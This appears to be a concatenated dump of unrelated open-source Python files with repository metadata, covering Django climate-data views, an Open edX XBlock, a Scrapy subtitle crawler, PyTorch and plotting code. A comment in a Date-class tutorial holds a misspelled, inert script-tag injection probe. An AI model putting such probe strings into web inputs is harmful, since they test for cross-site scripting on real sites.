print("@@@@@@@@@@@@@@@@@@@@@@@@",id)
in_txt = open(pathIn, mode="r", encoding='utf-8')
startFromLine = 9
linesCounter = 1
for line in in_txt:
if linesCounter >=startFromLine :
lis = line.split()
for n, i in enumerate(lis):
if i == "---":
lis[n] = 0
if len(lis)==18:
ClimateStatistics.objects.get_or_create(file_id=id, Year=lis[0], JAN=lis[1], FEB=lis[2], MAR=lis[3],APR=lis[4], MAY=lis[5], JUN=lis[6],JUL=lis[7], AUG=lis[8], SEP=lis[9], OCT=lis[10], NOV=lis[11],
DEC=lis[12], WIN=lis[13], SPR=lis[14], SUM=lis[15], AUT=lis[16],ANN=lis[17]
)
else:
ClimateStatistics.objects.get_or_create(file_id=id, Year=lis[0], JAN=lis[1], FEB=lis[2], MAR=lis[3],
APR=lis[4], MAY=lis[5], JUN=lis[6], JUL=lis[7], WIN=lis[8], SPR=lis[9],
)
linesCounter += 1
null_obj=ClimateStatistics.objects.filter(WIN="---")
for i in null_obj:
i.WIN=0
i.save()
return HttpResponse()
def download_csv(request, queryset):
csv_file = 'C:\\Users\\AMRIT\\Desktop\\project\\climate\\climate_app\\static\\data_extraction\\climate_data.csv'
opts = queryset.model._meta
# the csv writer
writer = csv.writer(open(csv_file, 'w'))
field_names = [field.name for field in opts.fields]
# Write a first row with header information
writer.writerow(field_names[2:])
# Write data rows
for obj in queryset:
writer.writerow([getattr(obj, field) for field in field_names[2:] ])
# print(csv.reader(open(csv_file,'r')))
return csv_file
def convert_to_csv(request,id):
csv_file = download_csv( request, ClimateStatistics.objects.filter(file_id=id).order_by("Year"))
return render(request,'data_extraction/d3.html')
|
[
"kumaramrit38@gmail.com"
] |
kumaramrit38@gmail.com
|
640c741dd9bb3b08088c64b6c6b4ed938a5eee3d
|
0a42fed6746cd9093fc3c3d4fbd7ac5d2cff310f
|
/python高级编程io/study02/code07_class_method.py
|
c1144121a6361a620dbc4cf0b5c7e4b4756da491
|
[] |
no_license
|
luoshanya/Vue_Study
|
4767fc46f2186c75a4b2f7baeeb2fcc9044bd9a4
|
d3a07364a63f0552b166a5697a7245f56e38e78d
|
refs/heads/master
| 2020-06-19T02:15:20.253362
| 2019-07-17T08:49:48
| 2019-07-17T08:49:48
| 196,529,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,015
|
py
|
class Date:
def __init__(self, year, month, day):
self.year = year
self.month = month
self.day = day
@staticmethod
def static(str_data):
year, month, day = tuple(str_data.split('-'))
return Date(int(year), int(month), int(day))
@classmethod
def cls_method(cls, str_data):
year, month, day = tuple(str_data.split('-'))
# cla代表是类名
return cls(int(year), int(month), int(day))
# 改变实例变量
def tomorrow(self):
self.day += 1
def __str__(self):
return '%s/%s/%s' % (self.year, self.month, self.day)
date = Date(2019, 6, 10)
date.tomorrow()
# print(date)
# <scrpt>alter('abc')</script>
data_str = '2019-6-10'
year, month, day = tuple(data_str.split('-'))
date = Date(int(year), int(month), int(day))
# print(date)
# 使用staticmethod完成初始化
date01 = Date.static(data_str)
# print(date01)
# 使用classmethod完成初始化
date02 = Date.cls_method(data_str)
# print(date02)
|
[
"310927880@qq.com"
] |
310927880@qq.com
|
d93e2c2dd0d791c1b5717f893307404535f8267a
|
f36cd54c6b66bcd373b8074bb9738649877f3438
|
/xblock_ifmo/core/xblock_ifmo.py
|
261c287cbec83f1292fdb889566877bd1b7b1643
|
[] |
no_license
|
npoed/ifmo-xblock-framework
|
2f635dfb848f968927122cd36b60fcd74b44ba33
|
d3eece00402eb69ffbdcb95e99c99d0b1c965106
|
refs/heads/master
| 2023-01-01T22:48:22.301231
| 2020-09-30T16:22:15
| 2020-09-30T16:22:15
| 299,882,622
| 0
| 0
| null | 2020-09-30T10:20:28
| 2020-09-30T10:20:27
| null |
UTF-8
|
Python
| false
| false
| 7,591
|
py
|
# -*- coding=utf-8 -*-
import logging
from courseware.models import StudentModule
from django.contrib.auth.models import User
from xblock.core import XBlock
from xmodule.util.duedate import get_extended_due_date
from webob.response import Response
from ..fragment import FragmentMakoChain
from ..utils import require, reify_f, deep_update
from .xblock_ifmo_fields import XBlockFieldsMixin
from .xblock_ifmo_resources import ResourcesMixin
logger = logging.getLogger(__name__)
@ResourcesMixin.register_resource_dir("../resources/ifmo_xblock")
class IfmoXBlock(XBlockFieldsMixin, ResourcesMixin, XBlock):
has_score = True
icon_class = 'problem'
def save_now(self):
"""
Большинство блоков используют celery на сервере, поэтому нужно
сохранять ссылки на задачи сразу, как они были зарезервированы.
:return:
"""
self.save()
def get_score(self):
return {
'score': self.points * self.weight,
'total': self.weight,
}
def max_score(self):
return self.weight
def save_settings(self, data):
"""
Не является обработчиком сам по себе, однако, его могут (и должны)
использовать дочерние обработчики, когда требуется сохранение
настроек.
:param data:
:return:
"""
parent = super(IfmoXBlock, self)
if hasattr(parent, 'save_settings'):
parent.save_settings(data)
self.display_name = data.get('display_name')
self.description = data.get('description')
self.weight = data.get('weight')
self.attempts = data.get('attempts')
return {}
def _get_score_string(self):
"""
Строка, отображающая баллы пользователя, рядом с заголовком (названием
юнита).
:return: Строка с баллами
"""
result = ''
# Отображается только в том случае, если за работу начисляются баллы
if self.weight is not None and self.weight != 0:
# if self.attempts > 0:
result = '(%s/%s баллов)' % (self.points * self.weight, self.weight,)
# else:
# result = '(%s points possible)' % (self.weight,)
return result
@XBlock.json_handler
def reset_user_state(self, data, suffix=''):
require(self._is_staff())
module = self.get_module(data.get('user_login'))
if module is not None:
module.state = '{}'
module.max_grade = None
module.grade = None
module.save()
return {
'state': "Состояние пользователя сброшено.",
}
else:
return {
'state': "Модуль для указанного пользователя не существует."
}
@XBlock.json_handler
def get_user_state(self, data, suffix=''):
require(self._is_staff())
module = self.get_module(data.get('user_login'))
if module is not None:
return {'state': module.state}
else:
return {
'state': "Модуль для указанного пользователя не существует."
}
@XBlock.json_handler
def get_user_data(self, data, suffix=''):
context = self.get_student_context_base()
context.update(self.get_student_context())
return context
def student_view(self, context=None):
fragment = FragmentMakoChain(lookup_dirs=self.get_template_dirs(),
content=self.load_template('xblock_ifmo/student_view.mako'))
fragment.add_javascript(self.load_js('ifmo-xblock-utils.js'))
fragment.add_javascript(self.load_js('ifmo-xblock.js'))
fragment.add_javascript(self.load_js('modals/init-modals.js'))
fragment.add_javascript(self.load_js('modals/state-modal.js'))
fragment.add_javascript(self.load_js('modals/debug-info-modal.js'))
fragment.add_css(self.load_css('base.css'))
fragment.add_css(self.load_css('modal.css'))
context = context or {}
deep_update(context, {'render_context': self.get_student_context()})
fragment.add_context(context)
return fragment
def studio_view(self, context=None):
fragment = FragmentMakoChain(lookup_dirs=self.get_template_dirs(),
content=self.load_template('xblock_ifmo/settings_view.mako'))
fragment.add_javascript(self.load_js('ifmo-xblock-utils.js'))
fragment.add_javascript(self.load_js('ifmo-xblock-studio.js'))
fragment.add_css(self.load_css('settings.css'))
fragment.initialize_js('IfmoXBlockSettingsView')
context = context or {}
deep_update(context, {'render_context': self.get_settings_context()})
fragment.add_context(context)
return fragment
@reify_f
def get_student_context(self, user=None):
return self.get_student_context_base(user)
@reify_f
def get_settings_context(self):
return {
'id': str(self.scope_ids.usage_id),
'metadata': {
'display_name': self.display_name,
'description': self.description,
'weight': self.weight,
'attempts': self.attempts,
},
}
def get_student_context_base(self, user=None):
due = get_extended_due_date(self)
return {
'meta': {
'location': str(self.scope_ids.usage_id),
'id': self.scope_ids.usage_id.block_id,
'name': self.display_name,
'text': self.description or "",
'due': due.strftime('%d.%m.%Y %H:%M:%S') if due else None,
'attempts': self.attempts,
},
'student_state': {
'score': {
'earned': self.points * self.weight,
'max': self.weight,
'string': self._get_score_string(),
},
'is_staff': self._is_staff(),
# This is probably studio, find out some more ways to determine this
'is_studio': self._is_studio(),
},
}
def _is_staff(self):
return getattr(self.xmodule_runtime, 'user_is_staff', False)
def _is_studio(self):
return self.runtime.get_real_user is None
def get_response_user_state(self, additional):
context = self.get_student_context_base()
context.update(additional)
return Response(json_body=context)
def get_module(self, user=None):
try:
if isinstance(user, User):
return StudentModule.objects.get(student=user,
module_state_key=self.location)
elif isinstance(user, (basestring, unicode)):
return StudentModule.objects.get(student__username=user,
module_state_key=self.location)
else:
return None
except StudentModule.DoesNotExist:
return None
|
[
"defance@gmail.com"
] |
defance@gmail.com
|
ce66af89f555b5a8250af7fb0556da9101942799
|
71c49e0cf373e72c5792a7e5aa5657400f9d8cf0
|
/photobooth/urls.py
|
c9bfe1b75b74848344e7c76f94b5728af1e1036f
|
[] |
no_license
|
relekang/photobooth
|
5aefaef5fff08008c0c320ee70979ff78eacc1cf
|
9c82d355c6f53a6e2743aabeaf2c040300befbb5
|
refs/heads/master
| 2020-12-14T09:01:33.198677
| 2015-11-22T08:57:05
| 2015-11-22T08:57:41
| 46,576,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 606
|
py
|
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from . import views
admin.site.site_header = 'Photobooth'
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('photobooth.api.urls')),
url(r'^accounts/', include('django.contrib.auth.urls')),
url(r'^remote/$', views.Remote.as_view()),
url(r'^$', views.LandingPage.as_view()),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) \
+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"me@rolflekang.com"
] |
me@rolflekang.com
|
f2216bf62f0faca405139c23e58a303ebc325977
|
7c15f211adc9e9eb9f66ccdd570c9f38dff7ea8d
|
/packages/autorest.python/test/vanilla/version-tolerant/Expected/AcceptanceTests/CustomBaseUriVersionTolerant/setup.py
|
6d07b965c77d63558bf25ebcab0b322d3596a6e4
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
Azure/autorest.python
|
cc4bfbf91ae11535731cad37cedd6b733edf1ebd
|
a00d7aaa3753ef05cb5a0d38c664a90869478d44
|
refs/heads/main
| 2023-09-03T06:58:44.246200
| 2023-08-31T20:11:51
| 2023-08-31T20:11:51
| 100,315,955
| 47
| 40
|
MIT
| 2023-09-14T21:00:21
| 2017-08-14T22:58:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,008
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
PACKAGE_NAME = "autorestparameterizedhosttestclient"
version = "0.1.0"
setup(
name=PACKAGE_NAME,
version=version,
description="AutoRestParameterizedHostTestClient",
author_email="",
url="",
keywords="azure, azure sdk",
packages=find_packages(),
include_package_data=True,
install_requires=[
"isodate<1.0.0,>=0.6.1",
"azure-core<2.0.0,>=1.28.0",
],
long_description="""\
Test Infrastructure for AutoRest.
""",
)
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
aafdcfbae25f4fcd453f97b9ea98141dc461a671
|
ee86ad4b38f6ba13f195246f14224ba781f933cc
|
/알고리즘실습/AD/부분집합의합.py
|
60a9d43961a2c316d1da35f2f912afff9b53d73c
|
[] |
no_license
|
yejikk/Algorithm
|
aed7adf00c1e32d21b735b3b34dc6cb75049f164
|
531f43305b3a23c824c9e153151b7280c1dc2535
|
refs/heads/master
| 2020-04-17T06:17:28.961656
| 2019-11-16T08:02:49
| 2019-11-16T08:02:49
| 166,318,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 854
|
py
|
import sys
sys.stdin = open('부분집합의합.txt')
def subset(number):
# 원소의 수 -> S
# 원소의 수가 S개 일 경우 2**S는 전체 부분집합의 수를 의미(공집합 포함)
arr = [[] for _ in range(2**S)]
# 부분집합의 개수
for i in range(1<<S):
# 원소의 수만큼 비트 비교
for j in range(S):
if i & (1<<j):
arr[i].append(number[j])
return arr
T = int(input())
for tc in range(1, T+1):
S = 12
N, K = map(int, input().split())
number = list(map(int, range(1, S+1)))
setarr = subset(number)
flag = 0
cnt = 0
for i in range(len(setarr)):
if len(setarr[i]) == N and sum(setarr[i]) == K:
cnt += 1
if cnt > 0:
print('#{} {}'.format(tc, cnt))
else:
print('#{} {}'.format(tc, 0))
|
[
"dpwl7484@gmail.com"
] |
dpwl7484@gmail.com
|
46455eebd427110368c6d93e8210a4488b309052
|
fb3b43ab9e7e9874f8cc53caa44f292387d57cf7
|
/Mascotas/apps/mascota/forms.py
|
5ae54464b79e7193d43a79751430327e7d4f962e
|
[] |
no_license
|
CoriAle/zona
|
cdb06e4d9d1a4ed61731a285e5e71df0cdcfec31
|
8bd13ba3bc506f88ad02f26b4562b889effc3ac7
|
refs/heads/master
| 2021-08-06T20:21:04.050053
| 2017-11-07T02:07:47
| 2017-11-07T02:07:47
| 106,186,438
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,580
|
py
|
from django import forms
from apps.mascota.models import Mascota, Vacuna
class MascotaForm(forms.ModelForm):
class Meta:
model = Mascota
fields = [
'nombre',
'edad',
'fecha_rescate',
'genero',
'persona',
'vacuna',
'imagen',
]
labels = {
'Nombre',
'Edad',
'Fecha de rescate',
'Género',
'Adoptante',
'Vacuna',
'Foto',
}
widgets = {
'nombre': forms.TextInput(attrs = {'class': 'form-control'}),
'edad': forms.TextInput(attrs = {'class': 'form-control'}),
'fecha_rescate': forms.TextInput(attrs = {'class': 'form-control'}),
'genero': forms.TextInput(attrs = {'class': 'form-control'}),
'persona': forms.Select(attrs = {'class': 'form-control'}),
'vacuna': forms.CheckboxSelectMultiple(),
}
class VacunaForm(forms.ModelForm):
class Meta:
model = Vacuna
fields = [
'nombre',
'fecha_vencimiento' ,
'funcion',
]
labels = {
'Nombre',
'Fecha de caducidad'
'Indicaciones',
}
widgets = {
'nombre': forms.TextInput(attrs = {'class': 'form-control'}),
'fecha_vencimiento': forms.DateInput(format = ('%d-%m-%Y'), attrs = {'class': 'form-control'}),
'funcion': forms.Textarea(attrs = {'class': 'form-control'}),
}
|
[
"1995coral@hotmail.es"
] |
1995coral@hotmail.es
|
6137fb40a4e270db6cd3566678423d2092bad69c
|
1d9059e03874838318885990931e4f3dd741bb7e
|
/users/admin.py
|
91278752e36593cd98f7e5f9fc69427026d707bc
|
[] |
no_license
|
Chirag-Django/temp_nonstop
|
fc5efc42d9c484ad3431454f67a428fe5ce94000
|
2c5904d4e12e487447eda9a1d8e4a4b3c17307b9
|
refs/heads/master
| 2023-03-09T12:55:49.953273
| 2021-02-19T01:35:44
| 2021-02-19T01:35:44
| 340,226,456
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 215
|
py
|
from django.contrib import admin
from .models import Profile
# Register your models here.
class ProfileAdmin(admin.ModelAdmin):
list_display = ['user','address','age']
admin.site.register(Profile,ProfileAdmin)
|
[
"chirag.django@gmail.com"
] |
chirag.django@gmail.com
|
90c27e41c4db505141eefc01d03a5c22cf0cab02
|
35271f6bd874799df9a93dbe5bcc50272b619dc1
|
/ML/Pytorch/image_segmentation/semantic_segmentation_unet/dataset.py
|
0c0f098d474994373657cf0a025b40cc55516856
|
[
"MIT"
] |
permissive
|
aladdinpersson/Machine-Learning-Collection
|
c724186b64ae52efa6f9d4e97f37477900901d35
|
558557c7989f0b10fee6e8d8f953d7269ae43d4f
|
refs/heads/master
| 2023-08-31T20:52:06.493437
| 2023-03-21T11:44:08
| 2023-03-21T11:44:08
| 250,184,708
| 5,653
| 2,543
|
MIT
| 2023-09-02T03:51:36
| 2020-03-26T07:02:40
|
Python
|
UTF-8
|
Python
| false
| false
| 978
|
py
|
import os
from PIL import Image
from torch.utils.data import Dataset
import numpy as np
class CarvanaDataset(Dataset):
def __init__(self, image_dir, mask_dir, transform=None):
self.image_dir = image_dir
self.mask_dir = mask_dir
self.transform = transform
self.images = os.listdir(image_dir)
def __len__(self):
return len(self.images)
def __getitem__(self, index):
img_path = os.path.join(self.image_dir, self.images[index])
mask_path = os.path.join(self.mask_dir, self.images[index].replace(".jpg", "_mask.gif"))
image = np.array(Image.open(img_path).convert("RGB"))
mask = np.array(Image.open(mask_path).convert("L"), dtype=np.float32)
mask[mask == 255.0] = 1.0
if self.transform is not None:
augmentations = self.transform(image=image, mask=mask)
image = augmentations["image"]
mask = augmentations["mask"]
return image, mask
|
[
"aladdin.persson@hotmail.com"
] |
aladdin.persson@hotmail.com
|
c80d9a2343aca0918bbb101a3c88bd909e4f5918
|
7d2a4c5ca215a362ad6fbb70ef5b5f8c35d41dde
|
/Blogs/migrations/0002_alter_blog_image.py
|
0f7415c8765b564f966cfe2b42c4fbfbbaa858a1
|
[] |
no_license
|
samarthdubey46/e-waste-management-api
|
77dcc92fa31b01830196e5092cb8a9e181963d01
|
db1e8644c907f926f81405de82befe24802ca0f1
|
refs/heads/master
| 2023-07-15T14:15:10.199441
| 2021-08-31T08:02:53
| 2021-08-31T08:02:53
| 400,775,691
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
# Generated by Django 3.2.6 on 2021-08-28 08:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Blogs', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='image',
field=models.ImageField(null=True, upload_to='image/blogs/'),
),
]
|
[
"samarthdubey46@gmail.com"
] |
samarthdubey46@gmail.com
|
53a0ba2cffce925eb433917b92108940b30cdadd
|
d41d18d3ea6edd2ec478b500386375a8693f1392
|
/plotly/validators/splom/marker/colorbar/_yanchor.py
|
7bdec6fa6e20bdf476093c16d4c3744796a72d42
|
[
"MIT"
] |
permissive
|
miladrux/plotly.py
|
38921dd6618650d03be9891d6078e771ffccc99a
|
dbb79e43e2cc6c5762251537d24bad1dab930fff
|
refs/heads/master
| 2020-03-27T01:46:57.497871
| 2018-08-20T22:37:38
| 2018-08-20T22:37:38
| 145,742,203
| 1
| 0
|
MIT
| 2018-08-22T17:37:07
| 2018-08-22T17:37:07
| null |
UTF-8
|
Python
| false
| false
| 502
|
py
|
import _plotly_utils.basevalidators
class YanchorValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self,
plotly_name='yanchor',
parent_name='splom.marker.colorbar',
**kwargs
):
super(YanchorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
role='style',
values=['top', 'middle', 'bottom'],
**kwargs
)
|
[
"jon.mease@gmail.com"
] |
jon.mease@gmail.com
|
e6970cb8d04c3a1b3b3da121bdf7651f040de209
|
3bb57eb1f7c1c0aced487e7ce88f3cb84d979054
|
/lseval+lexmturk/scripts/sr_rankers/Run_All_Horn.py
|
eb5c4ae4dfce46d0995eda12dedd951c2de65797
|
[] |
no_license
|
ghpaetzold/phd-backup
|
e100cd0bbef82644dacc73a8d1c6b757b2203f71
|
6f5eee43e34baa796efb16db0bc8562243a049b6
|
refs/heads/master
| 2020-12-24T16:41:21.490426
| 2016-04-23T14:50:07
| 2016-04-23T14:50:07
| 37,981,094
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 806
|
py
|
import os
#Parameters:
Cs = ['1', '0.1']
epsilons = ['0.0001', '0.001']
kernels = ['0', '1', '2', '3', '4']
trainset = '../../corpora/ls_dataset_benchmarking_train.txt'
testset = '../../corpora/ls_dataset_benchmarking_test.txt'
os.system('mkdir ../../sr_rankings/horn')
counter = -1
for C in Cs:
for e in epsilons:
for k in kernels:
counter += 1
output = '../../sr_rankings/horn/ranks_'+C+'_'+e+'_'+k+'.txt'
trfile = './temp/train_feature_file_'+str(counter)+'.txt'
mfile = './temp/model_'+str(counter)+'.txt'
tefile = './temp/test_feature_file_'+str(counter)+'.txt'
sfile = './temp/scores_'+str(counter)+'.txt'
comm = 'nohup python Run_Horn.py '+trainset+' '+trfile+' '+C+' '+e+' '+k+' '+mfile+' '+tefile+' '+sfile+' '+testset+' '+output+' &'
os.system(comm)
#print(comm)
|
[
"ghpaetzold@outlook.com"
] |
ghpaetzold@outlook.com
|
73230a94456e0062d709d371ebeac405c5879b53
|
ee76919635ce69e14ddf64ee9483dca073625aaf
|
/pythonAlgorithm/Practice/15三数之和.py
|
f18feaa502c50835d85034cfb9039363f056ee87
|
[] |
no_license
|
bossjoker1/algorithm
|
574e13f0dd8fe6b3e810efc03649493e90504288
|
c745168a01380edb52155ca3918787d2dd356e5b
|
refs/heads/master
| 2022-07-13T16:26:10.324544
| 2022-07-10T03:28:15
| 2022-07-10T03:28:15
| 407,361,838
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,052
|
py
|
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
n=len(nums)
res=[]
# 特判
if(not nums or n<3):
return []
nums.sort()
res=[]
for i in range(n):
# 全为正整数的情况
if(nums[i]>0):
return res
# 冗余情况,加速
if(i>0 and nums[i]==nums[i-1]):
continue
# 定位i,L, R滑动。
L=i+1
R=n-1
while(L<R):
sum = nums[i]+nums[L]+nums[R]
if(sum==0):
res.append([nums[i],nums[L],nums[R]])
# 去重
while(L<R and nums[L]==nums[L+1]):
L=L+1
while(L<R and nums[R]==nums[R-1]):
R=R-1
L=L+1
R=R-1
elif(sum>0):
R=R-1
else:
L=L+1
return res
|
[
"1397157763@qq.com"
] |
1397157763@qq.com
|
0063eea34d1491e9546c8c5e3ed0b43f7fb66034
|
d57f981dc8a2cc80a273e49443c8f99aa38b5ad1
|
/posts/admin.py
|
3fbfa6f6c7502a23d5f1054b7a5bb564927db8be
|
[] |
no_license
|
zmm064/TryDjango19
|
cfa048f84e5998c9329ed167b79b6d155d8a7ae0
|
da2191ecc08ec17fb94c2c7510eee6e09d6db71d
|
refs/heads/master
| 2021-04-27T00:20:38.741458
| 2018-03-09T11:15:28
| 2018-03-09T11:15:28
| 123,797,934
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
from django.contrib import admin
# Register your models here.
from .models import Post
class PostAdmin(admin.ModelAdmin):
list_display = ["title", "updated", "timestamp"]
list_display_links = ["updated"]
list_filter = ["updated", "timestamp"]
list_editable = ["title"]
search_fields = ["title", "content"]
class Meta:
model = Post
admin.site.register(Post, PostAdmin)
|
[
"zmm064@foxmail.com"
] |
zmm064@foxmail.com
|
d530d04821718e82725fa9b779b7c11b08bd24ce
|
50e3ae7c6a057fb20af1a14641b3b03ce8b7516d
|
/Python-曾學文/final/subtitleCrawler/subtitleCrawler/subtitleCrawler/spiders/zmtiantang.py
|
f76bc8a05b2e2de0a69c7387e065f8f9cff54730
|
[] |
no_license
|
david30907d/HomeWork
|
a8787093baa95f4a39a0ad255d8a3304f156b6e6
|
6908d4bac7269a65b1e7bc6bca8096c304eeae3f
|
refs/heads/master
| 2020-12-29T02:32:37.124986
| 2018-06-26T14:06:35
| 2018-06-26T14:06:35
| 55,396,758
| 1
| 1
| null | 2019-11-04T03:25:21
| 2016-04-04T08:45:20
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,045
|
py
|
# -*- coding: utf-8 -*-
import scrapy
from bs4 import BeautifulSoup
import requests
import shutil
class ZmtiantangSpider(scrapy.Spider):
name = "zmtiantang"
allowed_domains = ["www.zmtiantang.com"]
start_urls = list(map(lambda x:'http://www.zmtiantang.com/e/action/ListInfo/?classid=1&page=' + str(x), range(4857, 5630)))
def parse(self, response):
res = BeautifulSoup(response.body)
downloadURL = res.select('span.label-danger')
for i in downloadURL:
yield scrapy.Request('http://'+self.allowed_domains[0] + i.parent['href'], callback=self.parse_detail)
def parse_detail(self, response):
res = BeautifulSoup(response.body)
download = res.select('.btn-sm')[0]
self.download_file('http://'+self.allowed_domains[0] + download['href'])
@staticmethod
def download_file(url):
local_filename = url.split('/')[-1]
r = requests.get(url, stream=True)
with open(local_filename + '.zip', 'wb') as f:
shutil.copyfileobj(r.raw, f)
|
[
"davidtnfsh@gmail.com"
] |
davidtnfsh@gmail.com
|
e06c17fe9746be2b35d591a6f3d3b6a268adc273
|
4947b045d4a221d4e92ac363b22c1213e1c11c0b
|
/eelbrain/plot/_line.py
|
2bfef0d4c951afafc731be98e67076905f3f535f
|
[
"BSD-3-Clause"
] |
permissive
|
weilongzheng/Eelbrain
|
51db9396ba5184493ff59e0d481aac3aae64442c
|
feb9bdec2a99aca3077e44f318aef1c85a2e4730
|
refs/heads/master
| 2020-03-28T18:31:24.633084
| 2018-09-12T02:38:57
| 2018-09-13T20:29:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,895
|
py
|
# -*- coding: utf-8 -*-
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
"Line plots"
from itertools import cycle, repeat
import numpy as np
from .._data_obj import ascategorial, asndvar, assub
from ._base import (
EelFigure, Layout, LegendMixin, XAxisMixin, find_axis_params_data,
frame_title)
from functools import reduce
class LineStack(LegendMixin, XAxisMixin, EelFigure):
"""Stack multiple lines vertically
Parameters
----------
y : NDVar
Values to plot.
x : cateorial
Variable to aggregate cases into lines (default is to plot each line).
sub : None | index array
Only use a subset of the data provided.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
offset : float | str
The distance between the baseline (y = 0) for the different lines.
Can be a string expressed as a function of y. For example,
``'0.66 * max(y)'`` will offset each line by 0.66 times the maximum
value in ``y`` (after aggregating if ``x`` is specified). The default is
``'2/3 * max(y.max(), -y.min())'``.
xlim : scalar | (scalar, scalar)
Initial x-axis view limits as ``(left, right)`` tuple or as ``length``
scalar (default is the full x-axis in the data).
xlabel : bool | str
X-axis label. By default the label is inferred from the data.
xticklabels : bool
Print x-axis tick-labels (set to False to suppress them).
ylabel : bool | str
Y-axis label. By default the label is inferred from the data.
colors : dict | sequence of colors
Colors for the lines (default is all lines in black).
ylabels : bool | dict | sequence of str
Labels for the different lines, placed along the y-axis.
legend : str | int | 'fig' | None
Matplotlib figure legend location argument or 'fig' to plot the
legend in a separate figure.
clip : bool
Clip lines outside of axes (default ``True``).
Notes
-----
Navigation:
- ``←``: scroll left
- ``→``: scroll right
- ``home``: scroll to beginning
- ``end``: scroll to end
- ``f``: x-axis zoom in (reduce x axis range)
- ``d``: x-axis zoom out (increase x axis range)
"""
_name = "LineStack"
def __init__(self, y, x=None, sub=None, ds=None, offset='y.max() - y.min()',
ylim=None, xlim=None, xlabel=True, xticklabels=True,
ylabel=True, order=None, colors=None, ylabels=True, xdim=None,
legend=None, clip=True, *args, **kwargs):
sub = assub(sub, ds)
if isinstance(y, (tuple, list)):
if x is not None:
raise TypeError(
"x can only be used to divide y into different lines if y "
"is a single NDVar (got y=%r)." % (y,))
elif order is not None:
raise TypeError("The order parameter only applies if y is a "
"single NDVar")
ys = tuple(asndvar(y_, sub, ds) for y_ in y)
xdims = set(y_.get_dimnames((None,))[0] for y_ in ys)
if len(xdims) > 1:
raise ValueError("NDVars must have same dimension, got %s" %
(tuple(xdims),))
xdim = xdims.pop()
ydata = tuple(y_.get_data(xdim) for y_ in ys)
ny = len(ydata)
xdim_objs = tuple(y_.get_dim(xdim) for y_ in ys)
xdata = tuple(d._axis_data() for d in xdim_objs)
xdim_obj = reduce(lambda d1, d2: d1._union(d2), xdim_objs)
if isinstance(offset, str):
offset = max(eval(offset, {'y': y_}) for y_ in ydata)
cells = cell_labels = tuple(y_.name for y_ in ys)
if ylabel is True:
_, ylabel = find_axis_params_data(ys[0], ylabel)
epochs = (ys,)
else:
y = asndvar(y, sub, ds)
if x is not None:
x = ascategorial(x, sub, ds)
y = y.aggregate(x)
# find plotting dims
if xdim is None and y.has_dim('time'):
ydim, xdim = y.get_dimnames((None, 'time'))
else:
ydim, xdim = y.get_dimnames((None, xdim))
xdim_obj = y.get_dim(xdim)
# get data
ydata = y.get_data((ydim, xdim))
if isinstance(offset, str):
offset = eval(offset, {'y': y})
# find cells
if x is None:
cells = y.get_dim(ydim)
cell_labels = tuple(map(str, cells))
else:
cells = cell_labels = x.cells
if order is not None:
sort_index = [cells._array_index(i) for i in order]
ydata = ydata[sort_index]
cells = tuple(cells[i] for i in sort_index)
cell_labels = tuple(cell_labels[i] for i in sort_index)
if ylabel is True:
_, ylabel = find_axis_params_data(y, ylabel)
epochs = ((y,),)
ny = len(ydata)
xdata = repeat(xdim_obj._axis_data(), ny)
offsets = np.arange(ny - 1, -1, -1) * offset
if ylabels is True:
ylabels = cell_labels
# colors
if colors is None:
color_iter = repeat('k', ny)
elif isinstance(colors, dict):
color_iter = (colors[cell] for cell in cells)
elif len(colors) < ny:
color_iter = cycle(colors)
else:
color_iter = colors
layout = Layout(1, 2. / ny, 6, *args, **kwargs)
EelFigure.__init__(self, frame_title(y, x), layout)
ax = self._axes[0]
handles = [ax.plot(x_, y_ + offset_, color=color, clip_on=clip)[0] for
x_, y_, offset_, color in
zip(xdata, ydata, offsets, color_iter)]
if ylim is None:
ymin = min(y.min() for y in ydata) if isinstance(ydata, tuple) else ydata.min()
ylim = (min(0, ydata[-1].min()) - 0.1 * offset,
offset * (ny - 0.9) + max(0, ydata[0].max()))
else:
ymin, ymax = ylim
ylim = (ymin, offset * (ny - 1) + ymax)
ax.grid(True)
ax.set_frame_on(False)
ax.xaxis.set_ticks_position('none')
ax.yaxis.set_ticks_position('none')
ax.set_yticks(offsets)
ax.set_yticklabels(ylabels or (), va='center' if ymin < 0 else 'baseline')
ax.set_ylim(ylim)
self._configure_xaxis_dim(xdim_obj, xlabel, xticklabels)
if ylabel:
ax.set_ylabel(ylabel)
XAxisMixin._init_with_data(self, epochs, xdim, xlim)
LegendMixin.__init__(self, legend, dict(zip(cell_labels, handles)))
self._show()
|
[
"christianmbrodbeck@gmail.com"
] |
